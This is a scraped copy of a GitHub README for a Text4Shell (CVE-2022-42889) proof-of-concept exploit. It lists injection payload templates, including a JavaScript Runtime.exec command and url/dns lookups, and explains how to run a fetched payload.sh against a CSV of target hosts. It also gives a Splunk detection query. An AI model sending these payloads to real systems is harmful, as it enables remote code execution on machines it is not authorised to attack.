Coder Social home page Coder Social logo

west-wind / cve-2022-42889 Goto Github PK

View Code? Open in Web Editor NEW
3.0 1.0 0.0 16 KB

Text4Shell PoC Exploit

License: MIT License

Python 100.00%
cve-2022-42889 cve-2022-42889-expliot text4shell text4shell-detection text4shell-exploit text4shell-poc-exploit text4shell-splunk-query

cve-2022-42889's Introduction

CVE-2022-42889 PoC

Text4Shell PoC Exploit, with ability to set custom payloads.

Payload

“${prefix:engine:input}”
Prefix available - “script”, “dns”, “url”
${script:name} ex - ${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}
${url:name} ex - ${url:UTF-8:https://domain.tld}
${dns:name} ex - ${dns:address|domain.tld}

Intended Use

Usage of this script is limited to personnel who are authorised to run the payload on the target hosts for vulnerability patching purposes only. Prior to running this script, ensure you are authorised.

Usage

git clone https://github.com/west-wind/CVE-2022-42889.git
python poc-cve-2022-42889.py

Getting Started

This POC expects to receive all targets in a CSV file titled --> allTargets.csv with one column titled --> targets, containing all the targets that need to be scanned ex., http://12.23.45.67:9099 or http://spark.domain.com. The / will be added by the script.

Enter the payload to be executed on the target in the POC.conf file. Your host in --> yourHostHere http://my_domain_here.com Your payload in --> yourPayloadHere payload.sh

Made for research purposes.

Detection Splunk Query

index=web sourcetype IN (nginx, waf_logs)
| eval actual=urldecode(_raw)
| rex field=actual "(?<payloadIdentified>\$\{(script|dns|url)\:[^\"]*)" max_match=0
| where isnotnull(payloadIdentified)
| table _time src_ip dest payloadIdentified status request url user_agent referrer

Patching & References

NIST NVD

Sysdig Blog

cve-2022-42889's People

Contributors

west-wind avatar

Stargazers

 avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.